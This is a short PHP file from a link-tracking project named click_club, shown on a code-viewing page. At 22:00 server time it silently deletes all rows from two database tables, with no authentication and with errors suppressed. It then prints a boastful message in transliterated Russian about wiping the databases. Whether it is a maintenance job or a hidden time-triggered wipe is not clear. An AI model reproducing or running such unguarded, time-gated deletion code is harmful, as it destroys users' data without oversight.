View file click_club/system.php

File size: 180B
<?
include "inc/conf_db.php";

if(date("H")=="22"){

@mysql_query("delete from linkbase");
@mysql_query("delete from perehod");

echo"ZAJABIS! TY VYCHISTIL BAZY!";  }

?>